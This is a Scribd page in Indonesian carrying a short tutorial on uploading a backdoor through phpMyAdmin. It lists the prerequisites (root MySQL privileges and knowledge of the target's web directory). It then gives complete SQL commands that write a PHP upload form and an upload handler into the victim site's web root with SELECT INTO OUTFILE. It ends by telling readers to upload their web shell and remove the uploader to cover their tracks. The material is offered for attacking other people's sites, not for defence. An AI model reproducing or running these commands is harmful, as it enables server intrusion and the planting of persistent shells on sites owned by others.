Scribd
Unggah
1K tayangan3 halaman

Upload Backdoor Lewat MySQL Database (PhpMyAdmin)

Dokumen tersebut memberikan tutorial singkat tentang cara mengupload backdoor melalui database MySQL menggunakan phpMyAdmin dengan memenuhi syarat-syarat tertentu seperti memiliki akses user root dan mengetahui lokasi direktori website target. Langkah-langkahnya adalah membuat form upload dan fungsi upload menggunakan perintah SQL untuk kemudian diakses melalui alamat web guna mengunggah shell.

Diunggah oleh

agung
Hak Cipta
© © All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd
1K tayangan3 halaman

Upload Backdoor Lewat MySQL Database (PhpMyAdmin)

Dokumen tersebut memberikan tutorial singkat tentang cara mengupload backdoor melalui database MySQL menggunakan phpMyAdmin dengan memenuhi syarat-syarat tertentu seperti memiliki akses user root dan mengetahui lokasi direktori website target. Langkah-langkahnya adalah membuat form upload dan fungsi upload menggunakan perintah SQL untuk kemudian diakses melalui alamat web guna mengunggah shell.

Diunggah oleh

agung
Hak Cipta
© © All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd
Anda di halaman 1/ 3

Upload Backdoor Lewat MySQL Database

(phpMyAdmin)
Mungkin sudah banyak dibahas di google ya. Namun berhubung lagi gak sibuk coba bikin
artikelnya aja barangkali ada yang kurang paham dengan tutor google. Jadi upload shell lewat
phpmyadmin itu sangat mungkin, tentu saja dengan syarat syarat tertentu.

berikut syarat syarat untuk bisa mengupload shell via phpmyadmin :


1. User mysql root atau yag setara root (have all privileges)
2. Tau lokasi atau direktori dari website target berjalan.

Oke dalam tutorial ini saya sudah memenuhi kedua syarat tersebut. User root dan tau lokasi dari
web. DI tutorial ini sebagai contoh saya menggunakan Windows Server. Untuk linux server caranya
sama saja, hanya sesuaikan saja direktorinya.
Oke langsung saja :
Masuk ke menu command lalu masukkan kode berikut :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data"
action="upload.php" method="post"><pre lang="html">Upload file :<form
enctype="multipart/form-data" action="upload2.php" method="post"><input
name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/server/htdocs/upload2.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Ubah yang dicetak tebal dengan direktori dari website. Perintah ini digunakan untuk membuat form
upload di website korban dengan nama upload2.php

Oke lagi. Sekarang masukkan kode berikut :


use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/server/htdocs/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "
<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print
"";?>');
SELECT * INTO OUTFILE 'C:/server/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Perintah ini untuk membuat fungsi upload dari file upload2.php .

Oke sekarang kita coba panggil file nya lewat web browser.
Sesuaikan dengan path yang kalian masukkan di command mysql nya. Yang dipanggil adalah
upload2.php
nah kalian akan mendapat sebuah uploader. Tinggal upload shell kalian lewat situ, dan hapus
uploadernya.

Oke sekian tutorial kali ini, jika kurang jelas silahkan komentar.

Anda mungkin juga menyukai